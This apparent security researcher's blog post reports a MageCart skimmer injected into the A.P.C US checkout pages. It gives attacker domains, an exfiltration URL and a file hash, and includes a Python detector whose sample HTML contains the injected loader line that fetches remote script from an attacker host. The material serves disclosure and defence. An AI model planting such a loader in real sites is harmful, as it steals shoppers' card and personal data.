French Designer Clothing Line “A.P.C” compromised by MageCart Credit Card Theft Group

NOTE:
This blog post was submitted by @MeltX0R, a security researcher.

ASSOCIATED DOMAINS:

www.apc-us.com – Compromised website
alabamascripts.com – MageCart owned domain serving malicious JavaScript
secure.checkercarts.com – MageCart owned domain used for data exfiltration
secure.itenvoirtech.com – MageCart owned domain used for data exfiltration
secure.upgradenstore.com – MageCart owned domain used for data exfiltration
aquastora.com – MageCart owned domain used for data exfiltration

IMAGES AND DETAILS:

Shown above: Example of network traffic generated by a user visiting the compromised website and having their personal information sniffed by the MageCart injected JavaScript code.

On 10/15/2018, injected JavaScript code consistent with the MageCart credit card theft group was identified on the website of the French designer clothing line “A.P.C” (which stands for Atelier de Production et de Création). The company is known for its minimalist designs and has stores worldwide (including the United States, Belgium, Germany, Japan, Australia, and England).

The malicious JavaScript code can be found both on the checkout page (www.apc-us.com/checkout/onepage/) and on the home page (www.apc-us.com). Note that this only affects the US version of the website – www.apc.fr appears to be unaffected by MageCart attacks at this time.

Shown above: Injected JavaScript code found on the checkout page and home page of APC-US.com, which loads additional JavaScript code from “alabamascripts.com/apcstore”.

The above JavaScript code causes additional external JavaScript to be loaded in the user’s browser from the URL “alabamascripts.com/apcstore”. This code sniffs the user input from the checkout form and, upon submission of the checkout form to the legitimate website, POSTs the sniffed data to a different external domain. Interestingly, the malicious JavaScript on the external domain is named after the compromised website (apcstore), suggesting this compromise was a targeted attack rather than a “spray and pray” style of attack.
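A defender checking a storefront for this kind of injection wants to know which hosts the page's scripts load from or reference. The following script is an added example (not code from the write-up) that parses a page's script tags and flags any host not on an allowlist; the sample HTML is constructed, and only the loader host alabamascripts.com comes from the write-up.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample of a checkout page with an injected loader script.
# Only the loader host (alabamascripts.com) is taken from the write-up;
# the other paths and hosts are made up for the example.
SAMPLE_HTML = """
<html><head>
<script src="/skin/frontend/base/default/js/checkout.js"></script>
<script src="https://cdn.example-store.com/lib.js"></script>
<script>var s=document.createElement("script");
s.src="https://alabamascripts.com/apcstore";document.head.appendChild(s);</script>
</head><body><form id="checkout"></form></body></html>
"""

class ScriptCollector(HTMLParser):
    """Collect external script src values and inline script bodies."""
    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._in_script = True  # inline script follows as data

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)

URL_RE = re.compile(r"https?://[^\s'\"<>]+")

def find_unexpected_hosts(html, allowed_hosts):
    """Return sorted hosts loaded by script tags, or referenced inside inline
    scripts, that are not on the allowlist. Relative src values are
    same-origin and therefore skipped."""
    parser = ScriptCollector()
    parser.feed(html)
    candidates = list(parser.srcs)
    for body in parser.inline:
        candidates.extend(URL_RE.findall(body))  # hosts a loader may fetch
    hosts = {urlparse(u).hostname for u in candidates}
    return sorted(h for h in hosts if h and h not in allowed_hosts)
```

Run against a fetched copy of the checkout page, the function returns every third-party host it would pull script from, so an unrecognised host like the one above stands out for review.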

Shown above: Obfuscated JavaScript code served from the URL “alabamascripts.com/apcstore”.

Shown above: Checkout form information being transmitted to the URL “aquastora.com/checkout/onepage/saveOrder/2d01949c945ff53f”. Note that because the externally hosted JavaScript code is pulled every time the user visits the page, it appears that the actors interchange several versions at random, each of which contains a different exfiltration domain.

NOTE:
Attempts to notify A.P.C of the compromise were made via phone and email; however, we have yet to hear back. As of 10/16/2018, the code is still active on the website.

EDIT:
As of 10/18/2018, the malicious script is no longer being loaded.

MALICIOUS FILES ASSOCIATED WITH MAGECART:

APCStore.js – Obfuscated JavaScript code used to skim Checkout form data (credit card, address, and other PII)
MD5: acb68f94feb101c7462e14b5455aa838